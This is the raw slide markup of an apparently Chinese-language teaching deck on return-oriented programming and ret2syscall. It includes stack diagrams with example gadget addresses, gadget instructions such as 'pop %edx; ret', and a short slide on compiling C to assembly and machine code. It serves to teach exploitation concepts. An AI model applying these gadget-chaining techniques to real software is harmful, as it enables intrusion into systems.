            </a:r>
            <a:endParaRPr sz="1867" kern="0"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596" name="Shape 1596"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744967" y="2481651"/>
            <a:ext cx="3581200" cy="4096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mov %eax, (%edx); ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867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597" name="Shape 1597"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7162473" y="4389000"/>
            <a:ext cx="848800" cy="4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ESP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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1598" name="Shape 1598"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8059740" y="4593800"/>
            <a:ext cx="537600" cy="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599" name="Shape 1599"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744967" y="5563900"/>
            <a:ext cx="3581200" cy="4096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" sz="1867" kern="0" dirty="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stack overflow; ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="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1600" name="Shape 1600"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1599" idx="0"/>
            <a:endCxn id="1594" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4535567" y="5188700"/>
            <a:ext cx="0" cy="3752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01" name="Shape 1601"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1594" idx="0"/>
            <a:endCxn id="1595" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4535567" y="3633733"/>
            <a:ext cx="0" cy="11452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02" name="Shape 1602"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1595" idx="0"/>
            <a:endCxn id="1596" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4535567" y="2891400"/>
            <a:ext cx="0" cy="3328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03" name="Shape 1603"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1590" idx="1"/>
            <a:endCxn id="1594" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6326133" y="4983717"/>
            <a:ext cx="2271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1604" name="Shape 1604"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1592" idx="1"/>
            <a:endCxn id="1595" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6326133" y="3428917"/>
            <a:ext cx="2271200" cy="276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1605" name="Shape 1605"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1593" idx="1"/>
            <a:endCxn id="1596" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6326133" y="2686467"/>
            <a:ext cx="2271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dash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1606" name="Shape 1606"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1320807" y="4778927"/>
            <a:ext cx="848800" cy="4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EIP</a:t>
            </a:r>
            <a:endParaRPr sz="1867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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1607" name="Shape 1607"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2218073" y="4983727"/>
            <a:ext cx="537600" cy="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608" name="Shape 1608"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="1534600"/>
            <a:ext cx="2095200" cy="7636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0x41414141</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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03406D20-12E8-432C-ADDF-6E3AC5DECF06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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ret2syscall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Shape 1589">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAB83BC1-A83C-4665-AF91-093EA999F710}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="299153" y="890764"/>
            <a:ext cx="8298180" cy="763588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ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(Return Oriented Programming)</a:t>
            </a:r>
            <a:endParaRPr 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4" name="Shape 1614"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="4601917"/>
            <a:ext cx="2095200" cy="7636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0x08052318</a:t>
            </a:r>
            <a:endParaRPr sz="1867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615" name="Shape 1615"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="3838317"/>
            <a:ext cx="2095200" cy="7636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value</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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616" name="Shape 1616"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="3074717"/>
            <a:ext cx="2095200" cy="7636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0x0809951f</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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617" name="Shape 1617"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="2304667"/>
            <a:ext cx="2095200" cy="7636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0x080788c1</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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618" name="Shape 1618"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744967" y="4778933"/>
            <a:ext cx="3581200" cy="4096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" sz="1867" kern="0" dirty="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pop %edx; ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="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619" name="Shape 1619"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744967" y="3224200"/>
            <a:ext cx="3581200" cy="4096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" sz="1867" kern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xor %eax, %eax; ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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620" name="Shape 1620"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744967" y="2481651"/>
            <a:ext cx="3581200" cy="4096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mov %eax, (%edx); ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867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621" name="Shape 1621"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7162473" y="2865000"/>
            <a:ext cx="848800" cy="4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ESP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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1622" name="Shape 1622"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8059740" y="3069800"/>
            <a:ext cx="537600" cy="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623" name="Shape 1623"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744967" y="5563900"/>
            <a:ext cx="3581200" cy="4096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stack overflow; ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1867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1624" name="Shape 1624"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1623" idx="0"/>
            <a:endCxn id="1618" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4535567" y="5188700"/>
            <a:ext cx="0" cy="3752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25" name="Shape 1625"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1618" idx="0"/>
            <a:endCxn id="1619" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4535567" y="3633733"/>
            <a:ext cx="0" cy="11452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26" name="Shape 1626"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1619" idx="0"/>
            <a:endCxn id="1620" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4535567" y="2891400"/>
            <a:ext cx="0" cy="3328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27" name="Shape 1627"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1614" idx="1"/>
            <a:endCxn id="1618" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6326133" y="4983717"/>
            <a:ext cx="2271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1628" name="Shape 1628"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1616" idx="1"/>
            <a:endCxn id="1619" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6326133" y="3428917"/>
            <a:ext cx="2271200" cy="276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1629" name="Shape 1629"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1617" idx="1"/>
            <a:endCxn id="1620" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6326133" y="2686467"/>
            <a:ext cx="2271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dash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1630" name="Shape 1630"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1320807" y="3254927"/>
            <a:ext cx="848800" cy="4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EIP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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1631" name="Shape 1631"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2218073" y="3459727"/>
            <a:ext cx="537600" cy="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632" name="Shape 1632"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4775833" y="4001567"/>
            <a:ext cx="2165200" cy="4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" sz="1867" kern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%edx = value</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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633" name="Shape 1633"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="1534600"/>
            <a:ext cx="2095200" cy="7636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0x41414141</a:t>
            </a:r>
            <a:endParaRPr sz="1867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D761A85A-D3BF-4345-9335-EB32FAE54EEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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ret2syscall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Shape 1589">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AF70847-1139-4140-A2C8-8DD44EF5DE69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="299153" y="890764"/>
            <a:ext cx="8298180" cy="763588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ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(Return Oriented Programming)</a:t>
            </a:r>
            <a:endParaRPr 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28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A9E4A5D-AFFC-48AE-A4BF-D19AF8E3AC03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466716" y="2801976"/>
            <a:ext cx="2861362" cy="1676077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sum:</a:t>
            </a:r>
            <a:endParaRPr sz="12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push ebp</a:t>
            </a:r>
            <a:endParaRPr sz="12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mov ebp, esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="457200">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="12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mov eax, [ebp+12]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="457200">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="12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add eax, [ebp+8]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="457200">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="12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pop ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="457200">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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ret</a:t>
            </a:r>
            <a:endParaRPr sz="12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7" name="Shape 129">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8A9693D-1A5B-4E5E-A51B-AAAE2A96A437}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="894987" y="2943504"/>
            <a:ext cx="2861362" cy="1393021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int sum(int x, int y)</a:t>
            </a:r>
            <a:endParaRPr sz="12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2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int t = x + y;</a:t>
            </a:r>
            <a:endParaRPr sz="12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return t;</a:t>
            </a:r>
            <a:endParaRPr sz="12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2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18" name="Shape 130">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{549B3D12-28A7-40B0-92F4-EE1F883F00A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="17" idx="3"/>
            <a:endCxn id="16" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3756349" y="3640015"/>
            <a:ext cx="710367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" name="Shape 128">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DB1B5CA-FB55-4D09-B1BA-24B7D423A926}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8068305" y="2801976"/>
            <a:ext cx="2861362" cy="1676077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sum:</a:t>
            </a:r>
            <a:endParaRPr sz="12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altLang="zh-CN" sz="12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0x55</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent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altLang="zh-CN" sz="12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0x89 0xe5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent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altLang="zh-CN" sz="12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0x8b 0x45 0x0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="12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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent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2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0x03 0x45 0x08</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent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2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0x5d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent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2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0xc3</a:t>
            </a:r>
            <a:endParaRPr sz="12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8" name="Shape 130">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EA7EC1F-EDA0-42B3-9853-FEC56994CB6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="16" idx="3"/>
            <a:endCxn id="7" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7328078" y="3640015"/>
            <a:ext cx="740227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" name="矩形 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47D44FFC-1C62-46F9-B4D6-A27301FF655E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3788367" y="3270682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编译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1425BF80-ADC1-427F-88F8-0CA6C2DBA40A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7375026" y="3270682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汇编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D87B1B5B-680F-4CD7-9FDB-067A58F33529}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1700336" y="2311734"/>
            <a:ext cx="12506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语言代码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3B1FB94A-3449-48EE-9A65-7C197BEFA80B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5343399" y="2311734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汇编代码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EDA4EC2B-5DE8-4CDB-9668-972EE44380FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9060404" y="2311734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机器码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CA6D9012-0DE0-4CBE-80CE-346D7414356C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="456111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二进制基础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| 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程序的编译与链接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5357079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" name="Shape 1639"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="4601917"/>
            <a:ext cx="2095200" cy="7636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0x08052318</a:t>
            </a:r>
            <a:endParaRPr sz="1867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640" name="Shape 1640"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="3838317"/>
            <a:ext cx="2095200" cy="7636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value</a:t>
            </a:r>
            <a:endParaRPr sz="1867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641" name="Shape 1641"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="3074717"/>
            <a:ext cx="2095200" cy="7636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0x0809951f</a:t>
            </a:r>
            <a:endParaRPr sz="1867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642" name="Shape 1642"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="2304667"/>
            <a:ext cx="2095200" cy="7636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0x080788c1</a:t>
            </a:r>
            <a:endParaRPr sz="1867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643" name="Shape 1643"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744967" y="4778933"/>
            <a:ext cx="3581200" cy="4096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pop %edx; ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1867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644" name="Shape 1644"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744967" y="3224200"/>
            <a:ext cx="3581200" cy="4096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" sz="1867" kern="0" dirty="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xor %eax, %eax; ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="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645" name="Shape 1645"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744967" y="2481651"/>
            <a:ext cx="3581200" cy="4096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" sz="1867" kern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mov %eax, (%edx); ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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646" name="Shape 1646"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7162473" y="2153800"/>
            <a:ext cx="848800" cy="4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ESP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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1647" name="Shape 1647"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8059740" y="2358600"/>
            <a:ext cx="537600" cy="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648" name="Shape 1648"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744967" y="5563900"/>
            <a:ext cx="3581200" cy="4096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stack overflow; ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1867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1649" name="Shape 1649"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1648" idx="0"/>
            <a:endCxn id="1643" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4535567" y="5188700"/>
            <a:ext cx="0" cy="3752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50" name="Shape 1650"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1643" idx="0"/>
            <a:endCxn id="1644" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4535567" y="3633733"/>
            <a:ext cx="0" cy="11452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51" name="Shape 1651"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1644" idx="0"/>
            <a:endCxn id="1645" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4535567" y="2891400"/>
            <a:ext cx="0" cy="3328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52" name="Shape 1652"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1639" idx="1"/>
            <a:endCxn id="1643" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6326133" y="4983717"/>
            <a:ext cx="2271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1653" name="Shape 1653"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1641" idx="1"/>
            <a:endCxn id="1644" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6326133" y="3428917"/>
            <a:ext cx="2271200" cy="276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1654" name="Shape 1654"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1642" idx="1"/>
            <a:endCxn id="1645" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6326133" y="2686467"/>
            <a:ext cx="2271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dash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1655" name="Shape 1655"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1320807" y="2442127"/>
            <a:ext cx="848800" cy="4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EIP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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1656" name="Shape 1656"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2218073" y="2646927"/>
            <a:ext cx="537600" cy="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657" name="Shape 1657"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4775833" y="4001567"/>
            <a:ext cx="2165200" cy="4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%edx = value</a:t>
            </a:r>
            <a:endParaRPr sz="1867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658" name="Shape 1658"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4775833" y="2852900"/>
            <a:ext cx="2165200" cy="4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%eax = 0</a:t>
            </a:r>
            <a:endParaRPr sz="1867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659" name="Shape 1659"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="1534600"/>
            <a:ext cx="2095200" cy="7636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0x41414141</a:t>
            </a:r>
            <a:endParaRPr sz="1867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ABBB589C-512D-4FE0-BA5C-C41D69DB67FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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ret2syscall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Shape 1589">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E913141E-802B-42B5-8306-4FDB9A8CEA44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="299153" y="890764"/>
            <a:ext cx="8298180" cy="763588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ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(Return Oriented Programming)</a:t>
            </a:r>
            <a:endParaRPr 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5" name="Shape 1665"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="4601917"/>
            <a:ext cx="2095200" cy="7636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0x08052318</a:t>
            </a:r>
            <a:endParaRPr sz="1867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666" name="Shape 1666"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="3838317"/>
            <a:ext cx="2095200" cy="7636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value</a:t>
            </a:r>
            <a:endParaRPr sz="1867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667" name="Shape 1667"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="3074717"/>
            <a:ext cx="2095200" cy="7636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0x0809951f</a:t>
            </a:r>
